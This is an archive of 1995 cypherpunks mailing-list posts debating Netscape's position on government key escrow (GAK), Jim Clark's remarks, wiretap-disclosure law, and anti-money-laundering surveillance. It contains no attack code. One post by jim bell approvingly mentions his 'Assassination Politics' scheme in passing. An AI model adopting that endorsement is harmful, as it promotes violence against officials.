> discuss some issues, and thus possibly trigger some ideas or arguments for
> attendees to make, than now? What's the point of waiting until it's over,
> when all we can do then is complain?

What news is there on this topic? I am a privacy guy. GAK sucks.
So what is news?

Is it news that the Crypto-guys think GAK sucks? As TCMay has written,
check the archives. Let's not cover already covered ground.

Come on, let's either talk about news, action (Ian's, RJC's, Daimen's, ...
hacks) or what we can really do to be effective.

My point, which I clearly failed to make, was that Netscape
has to date, done a pretty good job. The quotes from Jim Clark
indicate that he is clueless. Fine, use another browser.


> I think key escrow, whether of the Clipper variety or the SKE variety, is
> central to the themes of the group.

Netscape bombs are not relevant to what I think is the
charter of Cypherpunks.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 12:54:42 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
Message-ID: <199512032055.VAA13990@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alex Strasheim:

>  >       1     Make illegal software available by FTP
>  >       2     Explain it's doing so because ITAR is bullshit
>  >       3     Face the gov't down in the press and in the courts 
>  
>  Go for it.  We're behind you 100%.

      If I were worth billions, if I were the sparkle on the high-tech
bubble, if I had a Major hand in engineering crucial protocols, if my
company were so young that it hadn't yet had time to bog down in business
as usual, I think I probably would. That's a lot of Big talk and a lot of
Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else --
would give as much to my LDF as I gave to his (chump change, but more than
I could afford).
      Clark should ask himself what Rabbi Akiva put best: 

      If not me, who?
      If not now, when?

      I do my small part, in my small way; he can do his big part, in his
big way. One thing scares the spooks more than what they oppose:
publicity.

Hieronymous 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMINNr3g0mNE55u1AQFnDgH/UJgFGAW9njKTnm7FgJHMQa1J8VONag0v
5JupJbYMISWYHMZ0KbC8ts6GV9jqD7xYg9dWEHhWbFg3SHJ0CFVt6w==
=Zza/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 95 19:14:02 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: Do the Right Thing
In-Reply-To: <ace76787260210043e19@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951203221051.6107D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:
[....]
> Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson 
> has this in the preliminary program for CFP '96, sent out today:
> 
> "Events planned for this year's conference include: 
> 
> - Federal prosecutors square off against civil-liberties lawyers 
> in a Supreme Court test of the "Cryptography Control Act of 
> 1996", which criminalizes non-escrowed encryption." 
[.....] 

Tim knows this, but before some other careless reader sets off a panic, I 
want to make it clear that this is a MOOT court, in which
participants will PRETEND to test the validity of a HYPOTHETICAL act. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.miranda3@genie.com
Date: Sun, 3 Dec 95 14:38:47 PST
To: cypherpunks@toad.com
Subject: info?
Message-ID: <199512032235.AA089570133@relay1.geis.com>
MIME-Version: 1.0
Content-Type: text/plain


Can you send me information about your organization?

 --Joseph Miranda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 3 Dec 95 19:34:19 PST
To: rmarquis@umich.edu (Robert Marquis, Jr.)
Subject: Re: Questions
In-Reply-To: <v01530502ace7ad85c8de@[198.109.36.28]>
Message-ID: <199512040338.WAA24230@homeport.org>
MIME-Version: 1.0
Content-Type: text


All of these questions are answered in Bruce Schneier's excellent
book, Applied Cryptography, as well as in the sci.crypt FAQ and other
places.  Please take a look.

| I was wondering if anyone would be able to help me out.  I am writing a
| research paper and I need some interviews for it.  If you could answer any
| of these questions about security, I would greatly appreciate it.  Thanks
| for your time.
| 
| --Bob Marquis
| 
| Please send responses to rmarquis@umich.edu
| 
| 
| - How can PGP help secure something like e-mail?
| 
| - Are there any encryption schemes which are "unbreakable"?
| 
| - What would someone need to do to send an e-mail message which cannot be
| read or altered by anyone else, or is it not possible?
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 3 Dec 95 19:47:00 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: NOISE for Anon-sam
In-Reply-To: <199512040235.DAA29635@utopia.hacktic.nl>
Message-ID: <199512040344.WAA00492@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Salsa Sam
Salsa:
One of the disadvantages of an anon. address is there is no
non-"NOISY" way to ask you to...
	Please break your lines to rational lengths!

We now return you to the flame war in progress...


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 22:51:23 PST
To: cypherpunks@toad.com
Subject: AOL DROPS RESTRICTION ON WORD "BREAST"
Message-ID: <199512040651.BAA17397@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


More Common Sense?

AOL DROPS RESTRICTION ON WORD "BREAST"
America Online, which has been making efforts to police its own service by
purging obscene or vulgar expressions deemed to be offensive, has changed
its mind about the word "breast" and reinstated it as an acceptable term of
discussion.  A contributor to a breast cancer bulletin board had called the
purging of the word breast "outrageous and potentially life-threatening."
(Atlanta Journal-Constitution 2 Dec 95 F7)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 3 Dec 95 23:11:00 PST
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tMUkO-000950C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Sat, 2 Dec 1995, jim bell wrote:
>
>> >On Thu, 30 Nov 1995, sameer wrote:
>> >
>> >> > 
>> >> > What about a court order to (a) start comprehensive logging, and (b) not
>> >> > tell anyone under penalty of ______ .
>> >
>> >I am unaware of any authority for such an order.
>> >> 
>> >> 	Aren't court orders part of the public record? I don't quite
>> >
>> >Yes, but court orders can be sealed pending further order of the court.
>> 
>> Okay, maybe with your qualifications you can answer this.  It has always
>> mystified me why "the authorities" think they can engage in wiretapping
>> without informing the person wiretapped that this has occurred, despite the
>> fact that there was apparently never any precedent for this practice before
>> the "wiretap era."
>
>Because Congress passed the Electronic Communications Privacy Act which 
>is codified, as amended, at 18 U.S.C. Section 2510 et seq.  Section 
>2511(2)(a)(ii) states in part:  "Notwithstanding any other law, providers 
>of wire or electronic communication service ... are authorized 

"are authorized"?  You mean, NOT REQUIRED, but merely "authorized"?  

In any case, this doesn't explain why this is CONSTITUTIONAL.   I hope you understand the difference.

>to provide 
>information, facilities, or technical assistance to persons authorized by 
>law to intercept wire, oral, or electronic communications ... if such 
>provider ... has been provided with [a court order or a certification by 
>an appropriate official that a court order isn't required ...].

I realize that a phone company might not normally be expected to refuse to cooperate, but the way the thing above is written, they are merely "authorized" to do something, they are not required to do it.

 
>> In addition, I would like to be able to figure out a method to allow the
>> de-facto disclosure of such activities, and to in fact force the phone
>> company to do so, if they are asked to tap my or anyone else's phone.  It
>> occurred to me that even if there was a prohibition on explicitly revealing
>> that such a tap exists, it should be possible to require the telephone
>> company to certify that no tap exists, and to require that this
>> certification will be followed by an explicit and immediate de-certification
>> message the moment the phone company is unable to maintain such
>> certification.  The receipt of such a letter/fax/email will indicate that a
>> tap has been placed, despite the fact that it will not say so.
>
>Sorry.  
>
>In subsection B of the statute I quoted above, it states in 
>part:  "No provider of wire or electronic communication service ... shall 
>disclose the existence of any interception ... with respect to which the 
>person has been furnished a court order or certification ... except as 
>may be otherwise required by legal process and then only after prior 
>notification to the Attorney General or ....  Any such disclosure shall 
>render such person liable for the civil damages provided for in section 
>2520. 

Sorry, I don't think that's a satisfactory answer.  First,  it would presumably be possible to disclose the WIRETAP ORDER without explicitly disclosing the existence of the "interception" as stated above.  Admittedly it would amount to the same thing from the standpoint of the person wiretapped, but as far as I can see it would not LEGALLY be the same thing.  The letter from the phone company will state:

"We have received a wiretap order from the court listed below.  We have not YET acted on that order.  We are not disclosing the existence of any interception, and we cannot legally do that.  You are forewarned!"

Or, more coyly:

"Normally, we can reassure customers that their telephone lines are not being wiretapped by the police.  However, during the period of January 15, 1996 through January 30, 1996 we can no longer give you that assurance.  Please take care during this period."

Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.


> No cause of action shall lie against in any court against any 
>provider ... for providing information ... in accordance with the terms 
>of a court order or certification under this chapter." 
>
>Thus providing evidence of that one of the uses of lawyers is to [attempt 
>to close loopholes.

Which is an excellent reason for implementing my idea, "Assassination Politics."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 3 Dec 95 23:02:45 PST
To: unicorn@schloss.li
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <9512040703.AA14762@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why 
don't you write to Jim Clark yourself and tell him about his spinelessness and 
all your other opinions of him, his unacceptable attitude, and his worthless 
company, instead of getting granular with Jim and Dan here on the list?

After all, Jim Clark is the one who made the unpleasant statements.

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 95 23:10:33 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512040700.XAA14434@blob.best.net>
Message-ID: <30C29DD1.46CB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> > The whole point of our anti-GAK position is that
> > government mandated key escrow is bad.
> 
> "Our" anti-GAK position.

  Sorry, I was referring to the official Netscape company position, not
the personal position of either myself or Jim Clark.

> I would like to hear Jim Clark say "GAK is bad".

  So would I.  I don't know if he will take such a position or not.
I do believe that the company, Netscape, will take such a position
in the coming week.

> I would also like to hear him, and you, refrain from using the phrase
> "key escrow" and instead use the phrase "Government Access to Keys".

  I've been trying to use either GAK, or "mandatory key escrow" to
refer to the hated beast.  If I've used just "key escrow" in that
context, I'm sorry.  I've been trying to use the term "key escrow"
for cases when it is not mandatory.

> I draw your attention to the fact that Bill Gates did not use the
> intentionally misleading phrase "key escrow" in his book.

  I haven't read his book.  Did he take a position against GAK?  Did
he say that if GAK is required by law his company would or would not
implement it?  A summary of his comments on this topic would be
informative.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 23:20:36 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: "Got a subpoena?"
In-Reply-To: <m0tMUkO-000950C@pacifier.com>
Message-ID: <199512040715.XAA07095@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.

	It's in the phone company's best interest to be cooperative.
*but* in the case of, say, an internet privacy provider, it is in the
provider's best interest to be uncooperative.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Sun, 3 Dec 95 20:21:38 PST
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Do The Right Thing, Netscape GAK
In-Reply-To: <30C1660F.47EA@netscape.com>
Message-ID: <199512040420.XAA01277@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


among other words Jeff W. wrote...
>   I don't think you will ever be in this position.  If we are forced to implement
> GAK by the government, everyone else will too.

This comment is somewhat offensive to me.  I disagree.  In fact, it
is a pretty whiny sounding and spineless statement.  Jeff, you are not
making _me_ feel any better about Jim's comments!

Kudos to Hal for his clear rebuttal and adherence to facts.
Kudos to Tim for "Do The Right Thing".

I will add that my belief is that GAK will not be the profitable way
to go.  I share in Duncan Frissell's optimism that we are now too far
down the road.

Tim has claimed that browsers are a "no loyalty" product.  I will take
this a step further and go on record saying that a GAK'd browser will
be an economic loser.  It may sell a couple of contracts, but it will
never gain widespread acceptance.

Look at recent history on the net.  It is the net leaders who are
making the future happen.  Netscape is (was?) the epitome of this
new phenomenon.  If I were running a business, I would attempt to
fulfill cypherpunk-like requirements rather than trying to build
a "government approved" product.  Let's watch sameer...

Doing the "right thing" will end up being the "profitable thing".

Maybe I'm blue sky, but it is nice to base decisions on principle...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 3 Dec 95 20:22:25 PST
To: jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <01HYDZM9D75S9QUS9W@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jsw@netscape.com"  "Jeff Weinstein"  2-DEC-1995 19:58:15.80

E. ALLEN SMITH wrote:
>         I believe that the central question at hand is whether Netscape will
> incorporate mandatory GAK into any of its products if you have an economic
> (governmental purchase) rather than physical (governmental threat of violence)
> reason to do so. I would hope that the upcoming statement will clarify this
> position, and in the proper direction.

  If the government wants to purchase software for its own use that implements
key escrow, why is that bad?  The whole point of our anti-GAK position is that
government mandated key escrow is bad.  If individuals, companies, or government
agencies want to escrow their own keys, with the escrow agents of their own
choosing, I have no problem.  It's only when the government makes the escrow
and the agent mandatory that I've got a problem.
--------------------
	I apologize for my lack of clarity. I would agree with you on voluntary
escrow. My meaning in "governmental purchase" is that governments may use
tactics such as directing purchases to companies that cooperate with their
agenda. In other words, instead of properly spending the taxpayers' money on
the best browser, server, etcetera available, they may exclude programs
produced by a company not incorporating mandatory GAK.
--------------------

  I don't believe that Netscape will ship a product that mandates GAK
unless it was required by law to do so.  As long as it is legal to sell
non-escrowed crypto products in this country or elsewhere, I think we
will keep doing it, because that is what our customers want.
--------------------
	I am glad that your information leads you to this belief. However, I
would still prefer that the official company statement include a clear section
on this matter. (I would also, of course, prefer that this section be
clearly against GAK; Jim Clark's claim that there are any circumstances under
which a private citizen's communications should be tapped gives me cause to
doubt.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 95 16:14:31 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951203060612.24122C-100000@polaris.mindport.net>
Message-ID: <30c23e97.16338172@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote:

>On Sun, 3 Dec 1995, Dan Weinstein wrote:
>
>> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
>> <unicorn@schloss.li> wrote:
>> 
>> >On Sat, 2 Dec 1995, Jeff Weinstein wrote:
>> >
>> >> Black Unicorn wrote:
>
>> >> > To the outsider, it looks as if Netscape 'owes' the government.
>> >> 
>> >>   We do owe the government.  They have paid us for Servers and Clients
>> >> that support Fortezza.  That is what we owe them.  The money that the
>> >> NSA gave us for Fortezza is not very significant compared to what we
>> >> are getting from commercial sources.
>> >
>> >Obviously it was significant enough to take.  It was also a perfect 
>> >opportunity for Netscape to express concerns about the future of the 
>> >technology, which is in netscape's interest.  The astute deal maker would 
>> >be happy to work with the NSA on his own terms.  Instead, it 
>> >would appear that Netscape is working FOR NSA on their terms.
>> 
>> If you read what they had to say about this, you know that they are
>> hoping others will create non-escrowed crypto hardware using the same
>> interface.  I see no reason for them to not include support for any
>> available hardware system (even if it includes GAK), as long as they
>> continue to support non-escrowed encryption internally.  This allows
>> the customer to decide that they have no problem with GAK and use the
>> external system, or use the internal system and not have GAK.
>
>I read it quite carefully.  I just was not as easily taken in by the 
>double speak as you were.

I see, you cannot say that they are really supporting GAK based upon
the actual statements made, so you simply assert it.

>Hoping others will do something is about as useful as sitting on your thumb.

Yes, but making something an economically viable venture is very
useful.  That is what they have done.  They have implemented an
interface into a widely available piece of software.  This makes it
much more economically viable for others to implement strong crypto
into another product using the same interface.

>Netscape is in a position to make some policy impact here.  If they 
>insist on going another way, I want to hear why, not that they are all on 
>our side and we should be nice because really we're all in this together, 
>and after all, Netscape isn't such a bad lot.

Jeff Weinstein has said that Netscape is drafting an official position
paper and that it would be available in the near future.  If Netscape
lives up to this, we will soon enough have the company's position and
not just that of two employees (Jeff Weinstein and Jim Clark).  Why do
you feel you must jump to judge the company based on the opinions of
two of its employees?  This is especially questionable when one is
clearly stating that the company is against GAK and the other is at
worst being unclear.  If you feel they are being contradictory, wait a
week and look at their policy statement then decide.

>They can support whoever they like.  I just want to hear WHY.  More 
>importantly, I don't want to be snowed with some horse hockey answer.  It 
>insults my intelligence.  Yours was obviously unaffected.

Wait a week and read their official statement then decide.  You accuse
me of logical fallacies, but then argue through insult and assertion.
You have not pointed to a single fact or any contradictory statements
in posts to this list.  I will admit that Jim Clark was somewhat
unclear, but I attribute this to the fact that the official company
position is as yet not written and thus he is attempting to remain
somewhat neutral.

>> >I'd be interested to know what a 'government liaison person' is.  It 
>> >sounds to me like an 'in house lobbyist.'  There is an old joke in the 
>> >beltway about in house lobbyists.
>> >
>> >I also would like to know why you are actively lobbying for 
>> >'clarification' rather than 'modification' of the current policy.
>> 
>> Until the current policy is clearly defined it is like a moving
>> target.  Once the government has been pinned down to a single policy,
>> it will be much easier to dispute their policies.  Currently the
>> government can say anything they want about their enforcement of ITAR,
>> because they have not stated a clear set of rules with regard to it.
>> Once they have set clear rules, those rules can be shown to be overly
>> restrictive or even unenforceable.
>
>I believe you actually think you are teaching me something here.

You asked why they wanted clarification and I simply responded.

>I said before, and I will say again.  If Netscape is against GAK, then 
>let them be AGAINST GAK.  If they are just going to try and finesse their 
>way into the market without making too many waves, let's hear it that way 
>instead of some crap about how they are 'lobbying actively against GAK' 
>(Which I might point out, is an assertion that fell apart at the most 
>basic prodding).

Wait a week.  As far as their lobbying assertion falling apart, I must
have missed this.  My understanding is that:

A)  They support several industry groups that are taking an active
position in opposition to GAK.

B)  They have until very recently had only very limited resources.

C)  Have just recently hired an in house lobbyist.

D)  That they did not attend the Bernstein hearing.

Now given point B, I see no reason to expect that they would in the
past have done much more than they have.  Given point C, I see they
are currently expanding their lobbying.  If point D is the measure of
crypto correctness, then I too am guilty.  Though I do not live in the
vicinity, I guess I should have been expected to fly up to lend my
moral support.  Bovine excrement.

>> Also, lawyers usually advise clients based on a worst case scenario,
>> thus when the government is unclear on its rules, the lawyers advise
>> their clients based upon the worst possible interpretation of the law.
>> This is done to protect their client.  By not stating a policy, the
>> government is making that worst case happen, without having to be the
>> bad guy by actually attempting to enforce such a policy.
>
>I really think you are pompous enough to think you are teaching people 
>things they don't know here.

Again, you asked, I answered.  I did not expect that this would be new
to anyone on the list, but you asked.

>I invite you to re-read the entire conversation and discover, as an 
>exercise, that the issue is not what the government is or is not doing, 
>but what netscape is or is not doing.  I could care about Netscape's 
>loose-lipped lawyers.

You seem very concerned about what Netscape is doing, and as such
should be concerned about what their lawyers are _forced_ to tell
them.  I understand that the discussion is about Netscape not the
government, but discussing actions without discussing motives is
useless.

>> >
>> >Netscape seems to be taking the position, "We'd love it if you'd let us 
>> >do X, but we are happy to roll over for whatever."  and  "By the way, 
>> >what is the rule on exporting software again?"
>> >
>> >I am impressed that some effort is being made.  I think it in the form of 
>> >'too little, too late.'  But hey, who am I?
>> 
>> I think you are being too critical, they have done more than any
>> company I know of to make easy to use crypto widely available.
>
>0 + .00001 = .00001
>
>Yes, just as last time you checked, .00001 is still more than 0.

My point is that you are too quick to call your recent ally an enemy.
You may not see what Netscape has done as important, but I believe
that many do (including me).  They are supposed to have integrated
e-mail crypto in the final release of Navigator 2.0.  I will remind
you that Jeff Weinstein has said that this will not include GAK.

>> They
>> may be willing to obey the laws if they require GAK, but I do not feel
>> that they are just rolling over either.  I strongly oppose GAK, but I
>> do not believe that no crypto is better than GAK crypto.  I would
>> rather keep some people out than nobody out.
>
>Your ignorance is assuming that the options you present are the only 
>options available.  JW made the same mistake.  In logical discourse this 
>is called "narrowing the field."  It's a version of the 'straw man' 
>and a classic flaw in logical argument.

I am not saying that the choice is between either no crypto or GAK
crypto.  I am saying that they have only said that they will go to GAK
if the choice is between GAK crypto and no crypto.  To the best of my
knowledge they have not said that they would implement a GAK only
product in any other situation.  I think that this is reasonable, I do
not think that we should let it come to this.  We need to ensure that
they (or anyone else) are never put into that position.  (and yes they
should too.)

>> Dan Weinstein
>> djw@pdcorp.com
>> http://www.earthlink.net/~danjw
>> PGP public key is available from my Home Page.
>> All opinions expressed above are mine.
>> 
>> "I understand by 'freedom of Spirit' something quite definite -
>> the unconditional will to say No, where it is dangerous to say
>> No.    
>
>This has got to be the most ironic of signatures I have ever seen.
>
>Why don't you begin to apply the cute quotes you put in your .sig to real 
>life and tell Netscape to grow a backbone and say 'No.' to GAK?

I sent a message to Netscape after reading the article that started
this.  It simply stated that I wanted clarification on their position
on GAK and that if they were to support it they would lose a loyal
customer.  I have since been convinced by Jeff Weinstein's posts to
this list that the company does not support GAK, and in fact they
oppose it.  You would do better to spend less time insulting people
and more time trying to support your arguments.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 3 Dec 95 21:40:17 PST
To: cypherpunks@toad.com
Subject: No Privacy Right in the Americas ?
Message-ID: <Pine.BSD.3.91.951204003918.13763D-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
A 12 02 95 Bloomberg newsstory is headlined: 
 
     Latin American nations will help U.S. combat 
                 money laundering 
 
 
The newsstory's datelined: 
 
       BUENOS AIRES (Dec 2, 1995 - 16:38 EST) 
 
 
It reports: 
 
   A communique issued after a two-day meeting of ministers 
   and anti-drug officials from throughout the Americas said 
   countries had agreed to...establish systems to identify 
   transfers and deposits that could be linked to illegal 
   activities. 
 
 
Please note: NOT transfers and deposits that 
 
                    are so linked 
 
but t & d's that 
  
                  COULD BE so linked, 
 
                        and 
 
                      seized ! 
 
 
Perhaps that's why US Treasury Secretary Robert Rubin exclaimed 
 
     ...this conference was an enormous step forward. 
 
 
In particular, 
 
   Countries in the region were encouraged to follow the U.S. 
   lead in setting up organizations which use computerized 
   technology to search data bases for suspicious transactions, 
   said Rubin. 
 
 
Such organizations can be distant, official organizations or 
they can be neighborhood, job-creating, community-aware, entre- 
preneurial blessings.  Anyway you like it ! 
 
One selling-point at the conference: 
 
   Crime organizations such as the Yakuza in Japan, the Col- 
   ombian drug cartels and the Italian mafia depend on money 
   laundering to place their gains beyond the reach of the 
   law.
 
 
Rubin summed up the point: 
 
       Profits that can't be spent aren't profits. 
 
 
He would have us believe he doesn't know where to shop. 
 
The illegals can spend profits on neighborhood troops, troops 
armed --one way or another-- by the world's most successful 
arms supplier. 
 
The advantage to that supplier?  It keeps 
 
    all 34 [minus 1] democratic governments in the region 
 
destabilized --amenable to penetration by money bags who know 
how to thrive in managed chaos-- ; and still dependent on arms 
from the "distant," official supplier. 
 
The advantage to the money bags?  It diverts "profits that 
can't be spent" from directly competing with them. 
 
The advantage to the illegals?  Neighborhood troops protect 
turf and provide inexpensive medical treatment for those with 
complaints. 
 
The advantage to the politicos?  Low intensity warfare keeps 
government troops busy doing something besides staging coups. 
 
Managed chaos?  Like the Buenos Aires conference which 
 
    ...emerged from [Clinton's] Summit of the Americas held 
    in Miami a year ago.
 
 
Right to privacy?  But of course.  From scheming in Miami to 
"profits that can't be spent" coverup in Buenos Aires to "we 
don't do that anymore" death squads in any of the 34. 
 
               "But I meant, for the people." 
 
               "You mean you have a complaint?" 
 
 
Cordially, 
 
Jim 
 
 
NOTE.  The Nando Times website URL is: 
 
             http://www.nando.net 
 
       The online filename of the above newsstory is: 
 
                biz634_2.html 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 3 Dec 95 15:55:48 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
In-Reply-To: <61765.pfarrell@netcom.com>
Message-ID: <Pine.HPP.3.91.951204002623.24009A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Pat Farrell wrote:

> If the issue is just that people don't like the idea that the free,
> downloadable is GAK'd and that they have to pay $50 for a browser
> with strong crypto, please take your whining off list.

Thanks for the concern you are showing for the rest of the world.
What if the $50 outside the US will buy us a GAK'd client? We would
be much safer with 40 bits un-GAK'd than 64 bits GAK'd.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 22:07:33 PST
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30c23e97.16338172@email.pdcorp.com>
Message-ID: <Pine.SUN.3.91.951204003416.22255A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Dan Weinstein wrote:

> On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote:
> 
> >On Sun, 3 Dec 1995, Dan Weinstein wrote:
> >
> >> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
> >> <unicorn@schloss.li> wrote:
> >> 
> >> 
> >> If you read what they had to say about this, you know that they are
> >> hoping others will create non-escrowed crypto hardware using the same
> >> interface.  I see no reason for them to not include support for any
> >> available hardware system (even if it includes GAK), as long as they
> >> continue to support non-escrowed encryption internally.  This allows
> >> the customer to decide that they have no problem with GAK and use the
> >> external system, or use the internal system and not have GAK.
> >
> >I read it quite carefully.  I just was not as easily taken in by the 
> >double speak as you were.
> 
> I see, you cannot say that they are really supporting GAK based upon
> the actual statements made, so you simply assert it.

Again, you miss the point.  Again, you twist the issue.  I didn't say they 
were actively supporting GAK.  I said they were not opposing it with 
anything like vigor.

Show me now where I assert that "they are really supporting GAK."

I see.  You cannot say that I said that, so you simply assert it?

> 
> >Hoping others will do something is about as useful as sitting on your thumb.
> 
> Yes, but making something an economically viable venture is very
> useful.  That is what they have done.  They have implemented an
> interface into a widely available piece of software.  This makes it
> much more economically viable for others to implement strong crypto
> into another product using the same interface.

Uh... sure buddy.

Let's not forget something here.  Netscape is not removing itself from 
the role of crypto developer.  Quite the reverse.  They have purposefully 
included crypto in their product.  They claim to be for strong crypto.  I 
want to see more than words on that point.

When I said waiting for someone else to do something was useless, I was 
referring to Netscape's "allow others to oppose GAK actively while we do a 
lot of hand wringing" attitude.

> >Netscape is in a position to make some policy impact here.  If they 
> >insist on going another way, I want to hear why, not that they are all on 
> >our side and we should be nice because really we're all in this together, 
> >and after all, Netscape isn't such a bad lot.
> 
> Jeff Weinstein has said that Netscape is drafting an official position
> paper and that it would be available in the near future.

You, unlike me, are willing to let that be enough.  I will believe it 
when I see it.

This basically amounts to "at some point in the 'near future' I will tell 
you what we will do in the 'near future after the near future.'"

  If Netscape
> lives up to this, we will soon enough have the company's position and
> not just that of two employees (Jeff Weinstein and Jim Clark).  Why do
> you feel you must jump to judge the company based on the opinions of
> two of its employees?

Why do you feel you must sit on your hands and wait for the world to 
decide your fate for you?

Mr. Weinstein and Mr. Clark (I would hope) have some influence in these 
matters.  They have not (as far as I have seen) demonstrated to anyone 
that they have thought about them much.

What precisely is it about my free-speech urges and taunt to energize 
them that frightens you?

Am I too loud for your taste?

Does the fridge humming at night disturb you?

  This is especially questionable when one is
> clearly stating that the company is against GAK and the other is at
> worst being unclear.  If you feel they are being contradictory, wait a
> week and look at their policy statement then decide.

I would much rather try to get them to write the damn policy statement 
right in the first place than have to try and CHANGE a poor and intrenched 
policy once in place.

Clearly you have not done much of this kind of work in business or 
government before.

> >They can support whoever they like.  I just want to hear WHY.  More 
> >importantly, I don't want to be snowed with some horse hockey answer.  It 
> >insults my intelligence.  Yours was obviously unaffected.
> 
> Wait a week and read their official statement then decide.

See above as to why this is foolish and lazy.

>  You accuse
